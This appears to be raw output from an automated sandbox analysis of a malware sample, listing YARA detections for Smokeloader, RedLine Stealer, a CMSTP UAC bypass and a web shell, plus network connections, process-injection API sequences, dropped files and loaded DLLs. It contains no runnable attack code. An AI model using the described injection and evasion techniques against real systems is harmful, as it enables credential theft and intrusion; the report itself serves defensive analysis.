                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:50665 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:50354 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:50708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:50236 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:50666 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Yara match, File source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                E-Banking Fraud

                Source: Yara match, File source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY

                System Summary

                Source: 16.2.93B.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
                Source: 10.2.93B.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
                Source: 27.0.356F.exe.fe0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects downloader / injector, Author: ditekSHen
                Source: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 0000002B.00000002.2972702045.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                Source: 0000002B.00000002.2973148017.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 0000001E.00000002.2687018524.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                Source: 00000024.00000002.2584664956.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 0000001E.00000002.2686652141.0000000002B4F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR, Matched rule: Semi-Auto-generated - file ironshell.php.txt, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
                Source: C:\Users\user\AppData\Local\Temp\356F.exe, type: DROPPED, Matched rule: Detects downloader / injector, Author: ditekSHen
                Source: FE8B.exe.2.dr, Static PE information: section name: .vmp@3
                Source: vbsmartcardviewer.exe.21.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ObjectSerialization65.exe.26.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Windows\explorer.exe, Process Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\572.exe, Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401561
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156F
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401729
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_004023E5 NtQuerySystemInformation,0_2_004023E5
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401587
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, Code function: 0_2_004026A0 NtEnumerateKey,0_2_004026A0
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401553
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401561
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156B
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156F
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401729
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_004023E5 NtQuerySystemInformation,6_2_004023E5
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401583
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401587
                Source: C:\Users\user\AppData\Roaming\rghwvve, Code function: 6_2_004026A0 NtEnumerateKey,6_2_004026A0
                Source: C:\Users\user\AppData\Local\Temp\572.exe, Code function: 8_2_02590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,8_2_02590110
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 10_2_0040E48D NtQuerySystemInformation,10_2_0040E48D
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 10_2_00401B2C NtQueryInformationProcess,10_2_00401B2C
                Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 14_2_04FEF9BA NtCreateThreadEx,14_2_04FEF9BA
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 16_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,16_2_00409543
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 16_2_00401B2C NtQueryInformationProcess,16_2_00401B2C
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 16_2_0040E48D NtQuerySystemInformation,16_2_0040E48D
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp, Code function: 18_2_00423B94 NtdllDefWindowProc_A,18_2_00423B94
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp, Code function: 18_2_004125E8 NtdllDefWindowProc_A,18_2_004125E8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp, Code function: 18_2_004789DC NtdllDefWindowProc_A,18_2_004789DC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp, Code function: 18_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,18_2_004573CC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp, Code function: 18_2_0042F530 NtdllDefWindowProc_A,18_2_0042F530
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, Code function: 10_2_0040B453: DeviceIoControl,10_2_0040B453
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exe, Code function: 17_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,17_2_00409448
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp, Code function: 18_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004555D0
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0048756418_2_00487564
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0044558418_2_00445584
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0046977018_2_00469770
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0046771018_2_00467710
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0048D8C418_2_0048D8C4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004519A818_2_004519A8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0043DD6018_2_0043DD60
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Drivers\csrss.exe A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exe EC88B7D9AAB10E45DC4AC1AAFFA5D9DA9BF2E368580BDDF16F0DDE301E97B43F
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00405964 appears 116 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00408C14 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00406ACC appears 41 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00403400 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00445DE4 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 004078FC appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 004344EC appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00403494 appears 82 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00457D58 appears 73 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00453330 appears 93 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00457B4C appears 98 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00403684 appears 221 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 004460B4 appears 59 times
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: String function: 00401DE0 appears 32 times
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: 1EB9.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-399KA.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-S9GPV.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-VN2OC.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-1HD49.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-1P6UB.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: BroomSetup.exe.31.drStatic PE information: Number of sections : 11 > 10
                Source: is-IJL2N.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: S23UhdW5DH.exe, 00000000.00000000.2058750766.0000000000440000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWonder4 vs S23UhdW5DH.exe
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: msimg32.dll
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: msvcr100.dll
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                Source: C:\Windows\explorer.exeSection loaded: webio.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dll
                Source: C:\Windows\explorer.exeSection loaded: cdprt.dll
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: msvcr100.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: webio.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: csunsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: swift.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: nfhwcrhk.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: surewarehook.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wkscli.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: aep.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: atasi.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: nuronssl.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: ubsec.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: comsvcs.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cmlua.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cmutil.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: version.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: pcacli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: sfc_os.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: apphelp.dll
